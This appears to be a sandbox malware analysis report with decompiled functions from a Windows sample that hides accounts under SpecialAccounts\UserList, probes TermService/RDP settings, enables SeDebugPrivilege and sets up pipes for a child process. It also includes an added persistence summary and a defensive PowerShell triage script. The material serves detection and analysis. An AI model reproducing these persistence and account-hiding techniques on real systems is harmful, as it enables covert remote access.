                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                  • API String ID: 2046459734-177601018
                                  • Opcode ID: b43227a7f7030143bd91accb94493ef4bfc23c2ace7a9839163bc3e6c6cbbbe9
                                  • Instruction ID: 0a479e188c8e80083ad3493b7ec29c52a1503be388f48136fafe1c7c6f2d3922
                                  • Opcode Fuzzy Hash: b43227a7f7030143bd91accb94493ef4bfc23c2ace7a9839163bc3e6c6cbbbe9
                                  • Instruction Fuzzy Hash: 1B7192706005187ACB05BB62CC62EEE7B78EF4431AB00453FB906B62D2DB3C5A45CA99
                                  Uniqueness

                                  Uniqueness Score: -1.00%
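The two functions above write the artefacts a responder would look for on a host: the first copies the executable, registers it through the legacy HKCU `Windows\Load` value via `REG ADD`, drops a `programs.bat` that launches it with `wmic process call create`, and deletes the copy's `:Zone.Identifier` stream; the second (E0040E29A) checks `TermService\Parameters` and then writes a REG_DWORD 0 under `SpecialAccounts\UserList`, which hides the named account from the logon UI. The following triage script is an added example, not part of the Joe Sandbox report and not code from the sample. It assumes (the report does not say) that the batch file lands at `%APPDATA%\programs.bat` and that the `Load` value holds a plain or double-quoted path to the copied executable; it needs Windows PowerShell 5.1 or later for `Get-LocalUser`.

```powershell
# Added triage script for the behaviours decompiled above; it is not part of the
# Joe Sandbox report and not code from the sample.
# Assumptions (not stated by the report): the batch file is %APPDATA%\programs.bat,
# and the Load value holds a plain or double-quoted path to the copied executable.
# Run in Windows PowerShell 5.1+ (Get-LocalUser needs the LocalAccounts module).

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Check, $Detail) {
    $findings.Add([pscustomobject]@{ Check = $Check; Detail = $Detail })
}

# 1. Legacy autostart: HKCU\...\Windows\Load (written by the sample via REG ADD).
#    A clean profile normally has no Load value at all.
$winKey = 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows'
$load = (Get-ItemProperty -Path $winKey -Name Load -ErrorAction SilentlyContinue).Load
if ($load) {
    Add-Finding 'Winlogon Load value set' $load
    $loadPath = $load.Trim('"')
    if (Test-Path -LiteralPath $loadPath) {
        # The sample deletes the Zone.Identifier stream from its copy, so a Load
        # target without a mark-of-the-web is consistent with that behaviour.
        $motw = Get-Item -LiteralPath $loadPath -Stream Zone.Identifier -ErrorAction SilentlyContinue
        Add-Finding 'Load target has Zone.Identifier' ([bool]$motw)
    }
}

# 2. Dropped batch file (assumed location).
$bat = Join-Path $env:APPDATA 'programs.bat'
if (Test-Path -LiteralPath $bat) {
    Add-Finding 'programs.bat present' $bat
    # The report's strings show the batch file starting its target via wmic.
    $batText = Get-Content -LiteralPath $bat -Raw
    Add-Finding 'programs.bat uses wmic process call create' ($batText -match 'wmic\s+process\s+call\s+create')
}

# 3. Hidden accounts: a REG_DWORD 0 under SpecialAccounts\UserList hides that
#    account from the logon UI, which is what E0040E29A writes for the name at 0x55ad74.
$ulKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path -LiteralPath $ulKey) {
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    $localUsers = (Get-LocalUser).Name
    Get-ItemProperty -LiteralPath $ulKey |
        ForEach-Object { $_.PSObject.Properties } |
        Where-Object { $_.Name -notin $providerProps -and $_.Value -eq 0 } |
        ForEach-Object {
            $detail = '{0} (local account exists: {1})' -f $_.Name, ($localUsers -contains $_.Name)
            Add-Finding 'Hidden account (UserList = 0)' $detail
        }
}

# 4. E0040E29A opens TermService\Parameters (RDP) before creating the account;
#    record whether the key is present so it can be read alongside any hidden account.
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService\Parameters'
Add-Finding 'TermService\Parameters key present' (Test-Path -LiteralPath $tsKey)

$findings | Format-Table -AutoSize
```

Run it in the context of the affected user for the HKCU and `%APPDATA%` checks and elevated for the HKLM checks; an account that appears under `UserList` with value 0 but is absent from `Get-LocalUser` output has already been removed or was never local, and is worth correlating with the `rudp`/`rpdp` values the function stores.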

                                  C-Code - Quality: 100%
                                  			E0041001A(void* __eflags, char _a4) {
                                  				void* _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				void* _v20;
                                  				void* _v24;
                                  				struct _SECURITY_ATTRIBUTES _v36;
                                  				void* _t54;
                                  				void* _t61;
                                  				void* _t64;
                                  				int _t66;
                                  				void* _t76;
                                  				int _t94;
                                  				void* _t95;
                                  
                                  				E0040FFA8(0x426608);
                                  				_v12 = _v12 & 0x00000000;
                                  				_v16 = _v16 & 0x00000000;
                                  				_v8 = _v8 & 0x00000000;
                                  				_t94 = 1;
                                  				_v20 = _v20 & 0x00000000;
                                  				_v24 = _v24 & 0x00000000;
                                  				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
                                  				_v36.nLength = 0xc;
                                  				_v36.bInheritHandle = 1; // SECURITY_ATTRIBUTES with inheritable handles, so the process created later gets the pipe ends
                                  				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
                                  					L7:
                                  					E004101AB( &_v12);
                                  					E004101AB( &_v8);
                                  					E004101AB( &_v16);
                                  					E004101AB( &_v20);
                                  					E004101AB( &_v24);
                                  					E0040FFA8(0x426608);
                                  					_t94 = 0;
                                  				} else {
                                  					_t54 = GetCurrentProcess();
                                  					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
                                  						goto L7;
                                  					} else {
                                  						_t61 = GetCurrentProcess();
                                  						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x426610, 0, 0, 2) == 0) {
                                  							goto L7;
                                  						} else {
                                  							_t64 = GetCurrentProcess();
                                  							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x426614, 0, 0, 2);
                                  							_t101 = _t66;
                                  							if(_t66 == 0) {
                                  								goto L7;
                                  							} else {
                                  								E004101AB( &_v12);
                                  								E004101AB( &_v20);
                                  								E0040373F(_t95,  &_a4);
                                  								if(E0040FDB0(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
                                  									goto L7;
                                  								} else {
                                  									E004101AB( &_v8);
                                  									E004101AB( &_v24);
                                  									E004101AB( &_v16);
                                  									 *0x426618 = CreateEventA(0, 1, 0, 0); // manual-reset event, initially unsignalled
                                  									_t76 = CreateThread(0, 0, E0040FE49, 0x426608, 0, 0x426620); // handle kept at 0x42661c; E0040FFA8 signals the event, waits 0x1388 ms on the thread and then terminates it
                                  									 *0x42661c = _t76;
                                  									if(_t76 == 0) {
                                  										goto L7;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_a4);
                                  				return _t94;
                                  			}


                                  0x00410028
                                  0x0041002d
                                  0x00410034
                                  0x0041003a
                                  0x0041003e
                                  0x0041003f
                                  0x00410043
                                  0x00410047
                                  0x00410051
                                  0x0041005c
                                  0x00410068
                                  0x00410166
                                  0x00410169
                                  0x00410171
                                  0x00410179
                                  0x00410181
                                  0x00410189
                                  0x00410193
                                  0x00410198
                                  0x0041006e
                                  0x0041007d
                                  0x00410090
                                  0x00000000
                                  0x004100b2
                                  0x004100bd
                                  0x004100ca
                                  0x00000000
                                  0x004100d0
                                  0x004100db
                                  0x004100e4
                                  0x004100e6
                                  0x004100e8
                                  0x00000000
                                  0x004100ea
                                  0x004100ed
                                  0x004100f5
                                  0x0041010a
                                  0x00410116
                                  0x00000000
                                  0x00410118
                                  0x0041011b
                                  0x00410123
                                  0x0041012b
                                  0x00410152
                                  0x00410157
                                  0x0041015d
                                  0x00410164
                                  0x00000000
                                  0x00000000
                                  0x00410164
                                  0x00410116
                                  0x004100e8
                                  0x004100ca
                                  0x00410090
                                  0x0041019d
                                  0x004101a8

                                  APIs
                                    • Part of subcall function 0040FFA8: GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                    • Part of subcall function 0040FFA8: SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                    • Part of subcall function 0040FFA8: WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                    • Part of subcall function 0040FFA8: TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00410060
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0041007D
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 00410083
                                  • DuplicateHandle.KERNEL32 ref: 0041008C
                                  • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 004100A4
                                  • GetCurrentProcess.KERNEL32(00426610,00000000,00000000,00000002,?,00000000), ref: 004100BD
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100C3
                                  • DuplicateHandle.KERNEL32 ref: 004100C6
                                  • GetCurrentProcess.KERNEL32(00426614,00000000,00000000,00000002,?,00000000), ref: 004100DB
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100E1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00410137
                                  • CreateThread.KERNEL32(00000000,00000000,0040FE49,00426608,00000000,00426620), ref: 00410157
                                  • DuplicateHandle.KERNEL32 ref: 004100E4
                                    • Part of subcall function 004101AB: CloseHandle.KERNEL32(00426618), ref: 004101B5
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040FDB0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040FE02
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                  • String ID:
                                  • API String ID: 337272696-0
                                  • Opcode ID: bee2204493a4bc53444b4e07c688032234b56349314ca8f43c08d651a0757c88
                                  • Instruction ID: 45800abd4bc58874337c2637046ca9fcf03b4e80ac058ab55fe317e8ad8503fa
                                  • Opcode Fuzzy Hash: bee2204493a4bc53444b4e07c688032234b56349314ca8f43c08d651a0757c88
                                  • Instruction Fuzzy Hash: B4416571A40259BBEF10EBA1DC46FEF7B78AF04704F50457AB101B21D1DBBD9A84CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D42D(struct _QUERY_SERVICE_CONFIG* _a4) {
                                  				int _v8;
                                  				void* __ecx;
                                  				void* _t10;
                                  				void* _t26;
                                  				struct _QUERY_SERVICE_CONFIG* _t34;
                                  				void* _t37;
                                  
                                  				_v8 = 0;
                                  				_t10 = OpenSCManagerW(0, L"ServicesActive", 1); // SC_MANAGER_CONNECT
                                  				_t37 = _t10;
                                  				if(_t37 != 0) {
                                  					_t26 = OpenServiceW(_t37,  *_a4, 1); // SERVICE_QUERY_CONFIG on the service named by the caller
                                  					if(_t26 != 0) {
                                  					if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) { // 0x7a = ERROR_INSUFFICIENT_BUFFER: _v8 now holds the required size
                                  							_t34 = E00406045(_v8);
                                  							_a4 = _t34;
                                  							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
                                  								CloseServiceHandle(_t37);
                                  								CloseServiceHandle(_t26);
                                  								E00401099(_a4);
                                  								_t10 =  *(_t34 + 4); // QUERY_SERVICE_CONFIG.dwStartType (offset 4) is the return value
                                  							} else {
                                  								goto L6;
                                  							}
                                  						} else {
                                  							L6:
                                  							CloseServiceHandle(_t37);
                                  							CloseServiceHandle(_t26);
                                  							goto L7;
                                  						}
                                  					} else {
                                  						CloseServiceHandle(_t37);
                                  						L7:
                                  						_t10 = 0;
                                  					}
                                  				}
                                  				return _t10;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D440
                                  • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D459
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D466
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D475
                                  • GetLastError.KERNEL32 ref: 0040D47F
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D4A0
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B1
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C7
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                  • String ID: ServicesActive
                                  • API String ID: 1929760286-3071072050
                                  • Opcode ID: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction ID: 77105f180dc1f4f583609010b4a2cd32bd7f1b8692fb86ee244d35c389544786
                                  • Opcode Fuzzy Hash: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction Fuzzy Hash: B2119071904218BBC7119BB2DC49DDF3FBDEF853607118176F902E2250DB78AE04CAA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0040DD72(struct _CRITICAL_SECTION* __ecx, void* __edx) {
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v52;
                                  				char _v60;
                                  				char _v68;
                                  				char _v76;
                                  				signed int _v80;
                                  				char _v84;
                                  				char _v88;
                                  				char _v92;
                                  				signed int _v96;
                                  				signed int _v100;
                                  				intOrPtr _v104;
                                  				char _v108;
                                  				signed int _v112;
                                  				signed int _v116;
                                  				int _t102;
                                  				int _t103;
                                  				int _t106;
                                  				int _t107;
                                  				void* _t109;
                                  				void* _t110;
                                  				int _t111;
                                  				int _t113;
                                  				int _t114;
                                  				int _t120;
                                  				void* _t121;
                                  				int _t159;
                                  				void* _t172;
                                  				int _t181;
                                  				int _t182;
                                  				signed int _t203;
                                  				char* _t233;
                                  				intOrPtr _t244;
                                  				void* _t248;
                                  				char* _t251;
                                  				void* _t264;
                                  				struct _CRITICAL_SECTION* _t267;
                                  				signed int _t276;
                                  				signed int _t278;
                                  				signed int _t279;
                                  				void* _t281;
                                  
                                  				_t264 = __edx;
                                  				_t205 = __ecx;
                                  				_t281 = (_t279 & 0xfffffff8) - 0x5c;
                                  				_t267 = __ecx;
                                  				_t203 = 0;
                                  				_v84 = 0;
                                  				_v80 = 0;
                                  				_v96 = 0;
                                  				EnterCriticalSection(__ecx);
                                  				if(E00411177(_t205) == 1) {
                                  					_t205 =  &_v96;
                                  					E00410CFF( &_v96);
                                  				}
                                  				_t270 = _t267 + 0x38;
                                  				_t102 = PathFileExistsW( *(_t267 + 0x38));
                                  				_t283 = _t102;
                                  				if(_t102 != 0) {
                                  					L14:
                                  					_t271 = _t267 + 0x3c;
                                  					_t103 = PathFileExistsW( *(_t267 + 0x3c));
                                  					__eflags = _t103;
                                  					if(_t103 != 0) {
                                  						L20:
                                  						E0040DB52(_t267, _t264);
                                  						E0040DB39(_t267);
                                  						_t208 = _t267;
                                  						_t106 = E0040D8FB(_t267);
                                  						__eflags = _t106;
                                  						if(_t106 != 0) {
                                  							_t209 = _t267;
                                  							_t107 = E0040D856(_t267, _t264, _t208);
                                  							__eflags = _t107;
                                  							if(_t107 != 0) {
                                  								E0040DAD6(_t209);
                                  								_t109 = E004036F7( &_v92, L"SeDebugPrivilege");
                                  								_t110 = GetCurrentProcess();
                                  								_t265 = _t109;
                                  								_t111 = E00410B38(_t110, _t109);
                                  								E00405FEB(_v96);
                                  								__eflags = _t111;
                                  								if(_t111 != 0) {
                                  									_t213 =  *(_t267 + 0x2c);
                                  									_t113 = E0041229C( *(_t267 + 0x2c));
                                  									__eflags = _t113;
                                  									if(_t113 != 0) {
                                  										Sleep(0x3e8);
                                  										_t114 =  *(_t267 + 0x4c);
                                  										__eflags = _t114;
                                  										if(_t114 != 0) {
                                  											_t276 = _t203;
                                  											__eflags = _t276 - _t114;
                                  											do {
                                  												E00405DE9(_t213 & 0xffffff00 | __eflags > 0x00000000);
                                  												E0040373F( &_v92,  *((intOrPtr*)(_t267 + 0x44)) + _t276 * 4);
                                  												E0040D3A8( &_v96);
                                  												_t213 = _v100;
                                  												E00405FEB(_v100);
                                  												_t276 = _t276 + 1;
                                  												_v100 = _t203;
                                  												__eflags = _t276 -  *(_t267 + 0x4c);
                                  											} while (_t276 <  *(_t267 + 0x4c));
                                  										}
                                  										Sleep(0x1f4);
                                  										E0040373F( &_v92, _t267 + 0x28);
                                  										E0040D3A8( &_v96);
                                  										_t215 = _v100;
                                  										E00405FEB(_v100);
                                  										Sleep(0x1f4);
                                  										_t120 = E0040D4DB(_t265, __eflags, _v100);
                                  										__eflags = _t120;
                                  										if(_t120 != 0) {
                                  											_t121 = E00411177(_t215);
                                  											__eflags = _t121 - 1;
                                  											if(_t121 == 1) {
                                  												E00410CD8(_v96);
                                  											}
                                  											E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68, _t203, _t267 + 0x5c, _t267 + 0x60));
                                  											E00404C3B( &_v84);
                                  											LeaveCriticalSection(_t267);
                                  											_t203 = 8;
                                  										} else {
                                  											_push(_t267 + 0x60);
                                  											_push(_t267 + 0x5c);
                                  											_push(7);
                                  											goto L34;
                                  										}
                                  									} else {
                                  										E00410CD8(_v96);
                                  										_push(_t267 + 0x60);
                                  										_push(_t267 + 0x5c);
                                  										_push(5);
                                  										goto L34;
                                  									}
                                  								} else {
                                  									E00410CD8(_v96);
                                  									_push(_t267 + 0x60);
                                  									_push(_t267 + 0x5c);
                                  									_push(3);
                                  									goto L34;
                                  								}
                                  							} else {
                                  								E00410CD8(_v96);
                                  								_push(_t267 + 0x60);
                                  								_push(_t267 + 0x5c);
                                  								_push(6);
                                  								goto L34;
                                  							}
                                  						} else {
                                  							E00410CD8(_v96);
                                  							_push(_t267 + 0x60);
                                  							_push(_t267 + 0x5c);
                                  							_push(4);
                                  							L34:
                                  							E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68));
                                  							E00404C3B( &_v84);
                                  							LeaveCriticalSection(_t267);
                                  						}
                                  					} else {
                                  						E0040373F(_t281, _t271);
                                  						E00411722( &_v32, __eflags, _t205, _t203);
                                  						_t232 =  *((intOrPtr*)(_t267 + 0x58));
                                  						E00415847( *((intOrPtr*)(_t267 + 0x58)), _t264,  &_v88,  *((intOrPtr*)(_t267 + 0x64)), 3);
                                  						__eflags = _v100 - _t203;
                                  						if(_v100 != _t203) {
                                  							_t233 =  &_v28;
                                  							_t159 = E0041130F(_t233, _t232, _t232);
                                  							__eflags = _t159;
                                  							if(_t159 != 0) {
                                  								_push(_t233);
                                  								E0041165C( &_v28,  &_v76);
                                  								E00411644( &_v36);
                                  							}
                                  							E00403148( &_v76);
                                  							E0041140C( &_v28, __eflags);
                                  							goto L20;
                                  						} else {
                                  							E00403148( &_v76);
                                  							goto L8;
                                  						}
                                  					}
                                  				} else {
                                  					E0040373F(_t281, _t270);
                                  					E00411722( &_v32, _t283, _t205, _t203);
                                  					E0040373F(_t281, _t267 + 0x40);
                                  					E00411722( &_v68, _t283,  &_v32, _t203);
                                  					_v116 = _t203;
                                  					_v112 = _t203;
                                  					_v100 = _t203;
                                  					_v96 = _t203;
                                  					_t172 = E00411177( &_v68);
                                  					_t244 =  *((intOrPtr*)(_t267 + 0x58));
                                  					if(_t172 != 1) {
                                  						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 1));
                                  						E00403148( &_v84);
                                  						_t278 = _v100;
                                  						E004030CC( &_v108, _t278, 0x12e00);
                                  						_t248 = _t278 + 0x12e00;
                                  						_t179 = _v104 + 0xfffed200;
                                  						__eflags = _v104 + 0xfffed200;
                                  					} else {
                                  						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 2));
                                  						E00403148( &_v84);
                                  						_t278 = _v100;
                                  						E004030CC( &_v108, _t278, 0x1c800);
                                  						_t248 = _t278 + 0x1c800;
                                  						_t179 = _v104 + 0xfffe3800;
                                  					}
                                  					E004030CC( &_v76, _t248, _t179);
                                  					_t285 = _t278;
                                  					if(_t278 != 0) {
                                  						_t250 =  &_v28;
                                  						_t181 = E0041130F(_t250,  &_v76,  &_v76);
                                  						__eflags = _t181;
                                  						if(_t181 != 0) {
                                  							_push(_t250);
                                  							E0041165C( &_v28,  &_v92);
                                  							_t250 =  &_v36;
                                  							E00411644( &_v36);
                                  						}
                                  						_t251 =  &_v52;
                                  						_t182 = E0041130F(_t251, _t250, _t250);
                                  						__eflags = _t182;
                                  						if(_t182 != 0) {
                                  							_push(_t251);
                                  							E0041165C( &_v52,  &_v76);
                                  							E00411644( &_v60);
                                  						}
                                  						E00403148( &_v76);
                                  						E00403148( &_v92);
                                  						E0041140C( &_v52, __eflags);
                                  						_t205 =  &_v28;
                                  						E0041140C( &_v28, __eflags);
                                  						goto L14;
                                  					} else {
                                  						E00403148( &_v76);
                                  						E00403148( &_v92);
                                  						E0041140C( &_v52, _t285);
                                  						L8:
                                  						E0041140C( &_v28, _t285);
                                  						_t203 = _t203 | 0xffffffff;
                                  					}
                                  				}
                                  				E00403148( &_v84);
                                  				return _t203;
                                  			}

                                  APIs
                                  • EnterCriticalSection.KERNEL32 ref: 0040DD8F
                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DF39
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DDAD
                                    • Part of subcall function 0041130F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 00411326
                                    • Part of subcall function 0041130F: GetLastError.KERNEL32(?,?,?,004091CE,?,?,?), ref: 00411334
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E12C
                                    • Part of subcall function 0040D856: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                  • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E01F
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E16C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 1717069549-2896544425
                                  • Opcode ID: 7a5596d6f9b17c3493d3e3706fd43e1eb96af3e8f0f7be516742428879ee00f0
                                  • Instruction ID: 55d7e5f8d1f4b9ec0964da3279b74dcd5ea268b2ca2f52e34cb3dca68faebe82
                                  • Opcode Fuzzy Hash: 7a5596d6f9b17c3493d3e3706fd43e1eb96af3e8f0f7be516742428879ee00f0
                                  • Instruction Fuzzy Hash: D0B13171504245ABC304EF62CC919EFB7A8BF54348F40093EF552A71D1EB78EA49CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040DB52(void* __ecx, void* __edx) {
                                  				void* _v8;
                                  				WCHAR* _v12;
                                  				signed int _v16;
                                  				short* _v20;
                                  				short* _v24;
                                  				char _v28;
                                  				int _v32;
                                  				char _v36;
                                  				void* _t50;
                                  				void* _t62;
                                  				void* _t72;
                                  				void* _t96;
                                  
                                  				_t96 = __edx;
                                  				_t72 = __ecx;
                                  				_v8 = 0;
                                  				E004036F7( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
                                  				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
                                  					_t50 = E00412569(_t96, E004036F7( &_v16, L"ImagePath"),  &_v36);
                                  					E00405FEB(_v16);
                                  					E00412554( &_v8);
                                  					if(_t50 != 0) {
                                  						E0040300A( &_v36,  &_v12);
                                  						E004030FE( &_v36);
                                  						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
                                  							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
                                  								_t62 = E00412569(_t96, E004036F7( &_v16, L"ServiceDll"),  &_v36);
                                  								E00405FEB(_v16);
                                  								_t107 = _t62;
                                  								if(_t62 != 0) {
                                  									E00403549(_t72 + 0x20, E004032E6( &_v16, E0040300A( &_v36,  &_v28), _t107));
                                  									E00405FEB(_v16);
                                  									_v16 = _v16 & 0x00000000;
                                  									E00405FEB(_v28);
                                  								}
                                  								E00412554( &_v8);
                                  							}
                                  						}
                                  						E00405FEB(_v12);
                                  						_v12 = _v12 & 0x00000000;
                                  					}
                                  				}
                                  				E00403148( &_v36);
                                  				E00405FEB(_v20);
                                  				E00405FEB(_v24);
                                  				return E00412554( &_v8);
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0040DB93
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • StrStrW.SHLWAPI(?,svchost.exe), ref: 0040DBF7
                                  • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DC05
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0040DC22
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DB5E
                                  • ImagePath, xrefs: 0040DBA5
                                  • svchost.exe, xrefs: 0040DBEF
                                  • ServiceDll, xrefs: 0040DC30
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DB6E
                                  • svchost.exe -k, xrefs: 0040DBFD
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                  • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                  • API String ID: 2246401353-3333427388
                                  • Opcode ID: e62b033c753448ef77cd55ec4bf4ec78d5aac30aa8340905b37c8a1f5274b33c
                                  • Instruction ID: 0a0d703e0c22a180c861e42df2812f13597edfba14798331e50e127ee1e54c95
                                  • Opcode Fuzzy Hash: e62b033c753448ef77cd55ec4bf4ec78d5aac30aa8340905b37c8a1f5274b33c
                                  • Instruction Fuzzy Hash: 4C41E631D00119ABDB15EBA2CD92EEEBB79AF14748F50006AF801B21D1EB785F45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D3A8(short** _a4) {
                                  				void* _t2;
                                  				int _t8;
                                  				void* _t13;
                                  				int _t15;
                                  				void* _t17;
                                  
                                  				_t15 = 0;
                                  				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
                                  				_t17 = _t2;
                                  				if(_t17 != 0) {
                                  					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
                                  					if(_t13 != 0) {
